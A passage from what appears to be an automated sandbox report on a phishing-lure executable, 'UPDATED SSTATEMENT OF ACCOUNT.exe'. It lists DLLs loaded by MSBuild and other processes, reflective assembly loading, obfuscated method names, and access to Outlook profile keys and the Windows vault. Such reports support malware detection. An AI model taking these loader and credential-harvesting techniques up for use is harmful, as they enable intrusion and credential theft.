                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: zzUBZ.pdb source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr
                    Source: Binary string: zzUBZ.pdbSHA256 source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr

                    Data Obfuscation

                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: TgfQNrhQjjseHY.exe.0.dr, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.cs .Net Code: OI5QjapQfoSucKdLSo9 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.cs .Net Code: OI5QjapQfoSucKdLSo9 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.cs .Net Code: OI5QjapQfoSucKdLSo9 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.5910000.4.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe Code function: 0_2_0186D89E pushfd ; ret 0_2_0186D8A1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0690E998 push eax; retf 8_2_0690E9A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_00C90C23 push edi; retf 13_2_00C90CAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 13_2_00C9DA24 push ecx; ret 13_2_00C9DA26
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe Static PE information: section name: .text entropy: 7.318017102591194
                    Source: TgfQNrhQjjseHY.exe.0.dr Static PE information: section name: .text entropy: 7.318017102591194
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, UXUW0udg70mIAfO19dm.cs High entropy of concatenated method names: 'hGObYYROs1', 'w5bb8LoxpS', 'reKbDoRtHP', 'gyhbL0KaHv', 'YGtb7gommS', 'l6Qb5qGElQ', 'oXKbu0b469', 'GTbbVHLNMa', 'oT5bWslBUD', 'yV5b98lPrs'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, XUlWngz4TlbqdVkh6V.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XvLbwHlMxj', 'JO9bt0hiNZ', 'FmsbCP8562', 'iIVbr355kJ', 'vUtbAHuBDF', 'KGZbbnZ1TS', 'bH7bj41635'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, nPiq9cdZ7nsxoOEVMFR.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VfjjipJ5jB', 'ecNjcBEFjE', 'hMsjU0XmWl', 'mc7jBjno3X', 'hDEjlyeiyp', 'EXSjHKyttM', 'QRPjNo9sHc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, ktPfB7FoodvjaClP45.cs High entropy of concatenated method names: 'GYbwVdBgV0', 'ct9wWhPHWH', 'UCAwmZr14q', 'oW7wI1myv2', 'gPwwh8v6VZ', 'iw6wOWQEhP', 'uqvwsXyeS1', 'hgYwohn3BM', 'PhGw4Z3TXV', 'kPfwpbsgF5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, fx1x6XkTFKYRc4eMtM.cs High entropy of concatenated method names: 'tu6dQKKRJ8', 'iFXdS4G1N1', 'HSod1fDuDj', 'vvkd0J15nH', 'eEkdtorRPL', 'B1ndC2ZUap', 'eVTAmoTbuceFLwfp9k', 'EP1cPMVxG4ouBRJqQr', 'NoLddbb0nY', 'paRdZPMMqc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.cs High entropy of concatenated method names: 'OHCZEoGYXS', 'za6ZRUp1NC', 'LsfZfihH1x', 'PmqZeCABxg', 'fZBZnFtRZu', 'KgrZT24DKc', 'pdoZQDbKqR', 'HaiZSDAeXH', 'rtCZP9aj4v', 'se1Z14RjhC'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, fPL71nm2ZUapu9jmZJ.cs High entropy of concatenated method names: 'ibhTE7WPuU', 'ayaTf2Vb8l', 'utZTn2rtoy', 'C1hTQ5Q3o8', 'kfiTSM9SbK', 'Hrinllo2QW', 'twYnHSf6EQ', 'vgmnN3BD0A', 'YaTnvVftcJ', 'FGRn35nXKu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, YM2o09BF5gx5L68j9x.cs High entropy of concatenated method names: 'Puyr1SEOgw', 'jAWr0KQonX', 'ToString', 'GWmrRgEXER', 'mNZrfxJ7SI', 'QYlreBDUKc', 'mxxrnITVgY', 'rPPrTjJ5XC', 'thArQwQQ0J', 'eiVrSx1TM5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, KYivPAvbBoJxPUPiA2.cs High entropy of concatenated method names: 'ChcAR844sb', 'AqdAf7XApc', 'RMpAeoWPSD', 'fWxAnQoZrk', 'xOGAThLATv', 'HwbAQ8VVH2', 'cxIASGDdpG', 'TiJAPTrgTP', 'kkLA1FCnqZ', 'h4eA0ohWfu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, xKKRJ8VTFX4G1N1xGX.cs High entropy of concatenated method names: 'D3dfiKS5Sp', 'rMefcvvbZK', 'SpffU7HpJA', 'Y3nfB1h5XH', 'NYFflbvhV9', 'DYCfHO444e', 'Ro7fNWUTix', 'B7nfvBrXKx', 'PPSf3hYOWA', 'SjmfJ9OJLq'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, ejlP3Oxj5VTYEvKO5r.cs High entropy of concatenated method names: 'tZHDsgf5V', 'TqHL6fWn1', 'n4r5VkwwE', 'lcMunrfq2', 'RVYWKd0XW', 'lBY9qKXYe', 'Fx4iZHZBZDR5q6wj5U', 'hTgejTfqLGN7KQHyDI', 'MMDA6kDcf', 'DYEjtPCgx'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, TmNAWqstqFSpLbNpTE.cs High entropy of concatenated method names: 'pyQQRlBiSp', 'E0vQe21bOq', 'McCQTqJuBH', 'yINTJekOsy', 'vY5TzynDHT', 'zAXQgYfYec', 'LR2QdtQDri', 'w0fQxrxcPL', 'mdVQZ4CeYY', 'xkXQkqk348'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, mFN8l0JlMCpR0cYUUm.cs High entropy of concatenated method names: 'j0YbdHxUEM', 'yLAbZuoTT0', 'CmEbkWkI0T', 'VRqbRdmdvV', 'JjnbfoL9XJ', 'CW1bng2scv', 'DYFbTRNnyh', 'EpWANXpBum', 'MbQAvxSBmE', 'DPWA3vI2hG'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, kR0DFf3CmMYrZsqb6N.cs High entropy of concatenated method names: 'PsbAmTPdsH', 'UL4AI1KolP', 'zZFAMYgyW4', 'Un6AhXQrVl', 'YZfAicwbo0', 'MkBAOySJCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, mHKiENejJDcn6AxJbF.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CMfx300hPc', 'nkTxJ5PJPg', 'ogsxz1YYcH', 'b1BZgjYLca', 'GFCZdvwC4f', 'C9EZx9j4Aj', 'JcAZZ1cK44', 'qgRnKrpWhesTAI9XFDB'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, yUquE6UMuMSijVwDGu.cs High entropy of concatenated method names: 'ToString', 'wjeCp9TOsm', 'elwCIZR1jG', 'XLrCM6Or2t', 'B52ChAV4fs', 'Hc7COidv4y', 'r2mCqbdbRk', 'jrwCslyeRR', 'J30Co2JPTW', 'XT5C29RNwW'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, RgfDrXHKnC8jGFqB26.cs High entropy of concatenated method names: 'UIirv4wQPb', 'W3JrJPpmbb', 'apDAg4jARg', 'rt9AdpI2cx', 'uOFrpJ8Ou2', 'UmZraxJtnF', 'jNqrF5QNWn', 'CVBriPBh2v', 'sQWrcW8ea3', 'VtorU1OQPw'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, T82yWMWSofDuDjyvkJ.cs High entropy of concatenated method names: 'cH3eLV49E6', 'vTte5vCLHs', 'oYveVjVGRW', 'GTWeWhVeBq', 'hb4etnE68T', 'JZfeCR7GNq', 'g2nerLuvOO', 'bSyeAkjplI', 'RiiebyLH3g', 'yv2ejuWm7c'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, f9UIpU26JvmBTBSctL.cs High entropy of concatenated method names: 'vfHQYG4MDd', 'lxLQ80Eh3u', 'QJwQDjcDQV', 'RsSQLbiuv5', 'XTdQ7qxngP', 'JvcQ5uSdXS', 'aL5QucoJJX', 'RgDQVmDUTR', 'aucQWNTHuO', 'qASQ96w7M7'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, G4wV8Gf6v2K5jjGjCT.cs High entropy of concatenated method names: 'Dispose', 'EHid3gFA4w', 'JonxInLaGY', 'MbkXXgYQPF', 'fqYdJivPAb', 'ToJdzxPUPi', 'ProcessDialogKey', 'r2SxgR0DFf', 'pmMxdYrZsq', 'r6Nxx0FN8l'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, TeEwg8iN7vW6LLxRRW.cs High entropy of concatenated method names: 'hOqt4bLcLD', 'qRutaW7Rmk', 'JvOtiQ1wuX', 'DcZtcWNJdC', 'fnmtIY1ulX', 'xZTtMtD2ll', 'WuCthA6ndI', 'CuCtOQdDiY', 'aRHtqNsKQm', 'zZBtsruW67'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, KVbeayhXmtlCZ27r6N.cs High entropy of concatenated method names: 'i3FT6EgOZd', 'L0fTYU60io', 'O7ETDqlVyd', 'Yq1TLMDMZA', 'y5HT5YVhCu', 'VlKTu3RKje', 'H9lTWInGs8', 'DR2T9rw2JC', 'v12g6V4xk1vhjN1Ug52', 'bKrGdL4boFxp9Sou1KN'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, UXUW0udg70mIAfO19dm.cs High entropy of concatenated method names: 'hGObYYROs1', 'w5bb8LoxpS', 'reKbDoRtHP', 'gyhbL0KaHv', 'YGtb7gommS', 'l6Qb5qGElQ', 'oXKbu0b469', 'GTbbVHLNMa', 'oT5bWslBUD', 'yV5b98lPrs'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, XUlWngz4TlbqdVkh6V.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XvLbwHlMxj', 'JO9bt0hiNZ', 'FmsbCP8562', 'iIVbr355kJ', 'vUtbAHuBDF', 'KGZbbnZ1TS', 'bH7bj41635'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, nPiq9cdZ7nsxoOEVMFR.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VfjjipJ5jB', 'ecNjcBEFjE', 'hMsjU0XmWl', 'mc7jBjno3X', 'hDEjlyeiyp', 'EXSjHKyttM', 'QRPjNo9sHc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, ktPfB7FoodvjaClP45.cs High entropy of concatenated method names: 'GYbwVdBgV0', 'ct9wWhPHWH', 'UCAwmZr14q', 'oW7wI1myv2', 'gPwwh8v6VZ', 'iw6wOWQEhP', 'uqvwsXyeS1', 'hgYwohn3BM', 'PhGw4Z3TXV', 'kPfwpbsgF5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, fx1x6XkTFKYRc4eMtM.cs High entropy of concatenated method names: 'tu6dQKKRJ8', 'iFXdS4G1N1', 'HSod1fDuDj', 'vvkd0J15nH', 'eEkdtorRPL', 'B1ndC2ZUap', 'eVTAmoTbuceFLwfp9k', 'EP1cPMVxG4ouBRJqQr', 'NoLddbb0nY', 'paRdZPMMqc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.cs High entropy of concatenated method names: 'OHCZEoGYXS', 'za6ZRUp1NC', 'LsfZfihH1x', 'PmqZeCABxg', 'fZBZnFtRZu', 'KgrZT24DKc', 'pdoZQDbKqR', 'HaiZSDAeXH', 'rtCZP9aj4v', 'se1Z14RjhC'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, fPL71nm2ZUapu9jmZJ.cs High entropy of concatenated method names: 'ibhTE7WPuU', 'ayaTf2Vb8l', 'utZTn2rtoy', 'C1hTQ5Q3o8', 'kfiTSM9SbK', 'Hrinllo2QW', 'twYnHSf6EQ', 'vgmnN3BD0A', 'YaTnvVftcJ', 'FGRn35nXKu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, YM2o09BF5gx5L68j9x.cs High entropy of concatenated method names: 'Puyr1SEOgw', 'jAWr0KQonX', 'ToString', 'GWmrRgEXER', 'mNZrfxJ7SI', 'QYlreBDUKc', 'mxxrnITVgY', 'rPPrTjJ5XC', 'thArQwQQ0J', 'eiVrSx1TM5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, KYivPAvbBoJxPUPiA2.cs High entropy of concatenated method names: 'ChcAR844sb', 'AqdAf7XApc', 'RMpAeoWPSD', 'fWxAnQoZrk', 'xOGAThLATv', 'HwbAQ8VVH2', 'cxIASGDdpG', 'TiJAPTrgTP', 'kkLA1FCnqZ', 'h4eA0ohWfu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, xKKRJ8VTFX4G1N1xGX.cs High entropy of concatenated method names: 'D3dfiKS5Sp', 'rMefcvvbZK', 'SpffU7HpJA', 'Y3nfB1h5XH', 'NYFflbvhV9', 'DYCfHO444e', 'Ro7fNWUTix', 'B7nfvBrXKx', 'PPSf3hYOWA', 'SjmfJ9OJLq'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, ejlP3Oxj5VTYEvKO5r.cs High entropy of concatenated method names: 'tZHDsgf5V', 'TqHL6fWn1', 'n4r5VkwwE', 'lcMunrfq2', 'RVYWKd0XW', 'lBY9qKXYe', 'Fx4iZHZBZDR5q6wj5U', 'hTgejTfqLGN7KQHyDI', 'MMDA6kDcf', 'DYEjtPCgx'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, TmNAWqstqFSpLbNpTE.cs High entropy of concatenated method names: 'pyQQRlBiSp', 'E0vQe21bOq', 'McCQTqJuBH', 'yINTJekOsy', 'vY5TzynDHT', 'zAXQgYfYec', 'LR2QdtQDri', 'w0fQxrxcPL', 'mdVQZ4CeYY', 'xkXQkqk348'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, mFN8l0JlMCpR0cYUUm.cs High entropy of concatenated method names: 'j0YbdHxUEM', 'yLAbZuoTT0', 'CmEbkWkI0T', 'VRqbRdmdvV', 'JjnbfoL9XJ', 'CW1bng2scv', 'DYFbTRNnyh', 'EpWANXpBum', 'MbQAvxSBmE', 'DPWA3vI2hG'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, kR0DFf3CmMYrZsqb6N.cs High entropy of concatenated method names: 'PsbAmTPdsH', 'UL4AI1KolP', 'zZFAMYgyW4', 'Un6AhXQrVl', 'YZfAicwbo0', 'MkBAOySJCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, mHKiENejJDcn6AxJbF.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CMfx300hPc', 'nkTxJ5PJPg', 'ogsxz1YYcH', 'b1BZgjYLca', 'GFCZdvwC4f', 'C9EZx9j4Aj', 'JcAZZ1cK44', 'qgRnKrpWhesTAI9XFDB'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, yUquE6UMuMSijVwDGu.cs High entropy of concatenated method names: 'ToString', 'wjeCp9TOsm', 'elwCIZR1jG', 'XLrCM6Or2t', 'B52ChAV4fs', 'Hc7COidv4y', 'r2mCqbdbRk', 'jrwCslyeRR', 'J30Co2JPTW', 'XT5C29RNwW'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, RgfDrXHKnC8jGFqB26.cs High entropy of concatenated method names: 'UIirv4wQPb', 'W3JrJPpmbb', 'apDAg4jARg', 'rt9AdpI2cx', 'uOFrpJ8Ou2', 'UmZraxJtnF', 'jNqrF5QNWn', 'CVBriPBh2v', 'sQWrcW8ea3', 'VtorU1OQPw'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, T82yWMWSofDuDjyvkJ.cs High entropy of concatenated method names: 'cH3eLV49E6', 'vTte5vCLHs', 'oYveVjVGRW', 'GTWeWhVeBq', 'hb4etnE68T', 'JZfeCR7GNq', 'g2nerLuvOO', 'bSyeAkjplI', 'RiiebyLH3g', 'yv2ejuWm7c'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, f9UIpU26JvmBTBSctL.cs High entropy of concatenated method names: 'vfHQYG4MDd', 'lxLQ80Eh3u', 'QJwQDjcDQV', 'RsSQLbiuv5', 'XTdQ7qxngP', 'JvcQ5uSdXS', 'aL5QucoJJX', 'RgDQVmDUTR', 'aucQWNTHuO', 'qASQ96w7M7'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, G4wV8Gf6v2K5jjGjCT.cs High entropy of concatenated method names: 'Dispose', 'EHid3gFA4w', 'JonxInLaGY', 'MbkXXgYQPF', 'fqYdJivPAb', 'ToJdzxPUPi', 'ProcessDialogKey', 'r2SxgR0DFf', 'pmMxdYrZsq', 'r6Nxx0FN8l'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, TeEwg8iN7vW6LLxRRW.cs High entropy of concatenated method names: 'hOqt4bLcLD', 'qRutaW7Rmk', 'JvOtiQ1wuX', 'DcZtcWNJdC', 'fnmtIY1ulX', 'xZTtMtD2ll', 'WuCthA6ndI', 'CuCtOQdDiY', 'aRHtqNsKQm', 'zZBtsruW67'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, KVbeayhXmtlCZ27r6N.cs High entropy of concatenated method names: 'i3FT6EgOZd', 'L0fTYU60io', 'O7ETDqlVyd', 'Yq1TLMDMZA', 'y5HT5YVhCu', 'VlKTu3RKje', 'H9lTWInGs8', 'DR2T9rw2JC', 'v12g6V4xk1vhjN1Ug52', 'bKrGdL4boFxp9Sou1KN'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, UXUW0udg70mIAfO19dm.csHigh entropy of concatenated method names: 'hGObYYROs1', 'w5bb8LoxpS', 'reKbDoRtHP', 'gyhbL0KaHv', 'YGtb7gommS', 'l6Qb5qGElQ', 'oXKbu0b469', 'GTbbVHLNMa', 'oT5bWslBUD', 'yV5b98lPrs'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, XUlWngz4TlbqdVkh6V.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XvLbwHlMxj', 'JO9bt0hiNZ', 'FmsbCP8562', 'iIVbr355kJ', 'vUtbAHuBDF', 'KGZbbnZ1TS', 'bH7bj41635'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, nPiq9cdZ7nsxoOEVMFR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VfjjipJ5jB', 'ecNjcBEFjE', 'hMsjU0XmWl', 'mc7jBjno3X', 'hDEjlyeiyp', 'EXSjHKyttM', 'QRPjNo9sHc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, ktPfB7FoodvjaClP45.csHigh entropy of concatenated method names: 'GYbwVdBgV0', 'ct9wWhPHWH', 'UCAwmZr14q', 'oW7wI1myv2', 'gPwwh8v6VZ', 'iw6wOWQEhP', 'uqvwsXyeS1', 'hgYwohn3BM', 'PhGw4Z3TXV', 'kPfwpbsgF5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, fx1x6XkTFKYRc4eMtM.csHigh entropy of concatenated method names: 'tu6dQKKRJ8', 'iFXdS4G1N1', 'HSod1fDuDj', 'vvkd0J15nH', 'eEkdtorRPL', 'B1ndC2ZUap', 'eVTAmoTbuceFLwfp9k', 'EP1cPMVxG4ouBRJqQr', 'NoLddbb0nY', 'paRdZPMMqc'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.csHigh entropy of concatenated method names: 'OHCZEoGYXS', 'za6ZRUp1NC', 'LsfZfihH1x', 'PmqZeCABxg', 'fZBZnFtRZu', 'KgrZT24DKc', 'pdoZQDbKqR', 'HaiZSDAeXH', 'rtCZP9aj4v', 'se1Z14RjhC'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, fPL71nm2ZUapu9jmZJ.csHigh entropy of concatenated method names: 'ibhTE7WPuU', 'ayaTf2Vb8l', 'utZTn2rtoy', 'C1hTQ5Q3o8', 'kfiTSM9SbK', 'Hrinllo2QW', 'twYnHSf6EQ', 'vgmnN3BD0A', 'YaTnvVftcJ', 'FGRn35nXKu'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, YM2o09BF5gx5L68j9x.csHigh entropy of concatenated method names: 'Puyr1SEOgw', 'jAWr0KQonX', 'ToString', 'GWmrRgEXER', 'mNZrfxJ7SI', 'QYlreBDUKc', 'mxxrnITVgY', 'rPPrTjJ5XC', 'thArQwQQ0J', 'eiVrSx1TM5'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, KYivPAvbBoJxPUPiA2.csHigh entropy of concatenated method names: 'ChcAR844sb', 'AqdAf7XApc', 'RMpAeoWPSD', 'fWxAnQoZrk', 'xOGAThLATv', 'HwbAQ8VVH2', 'cxIASGDdpG', 'TiJAPTrgTP', 'kkLA1FCnqZ', 'h4eA0ohWfu'
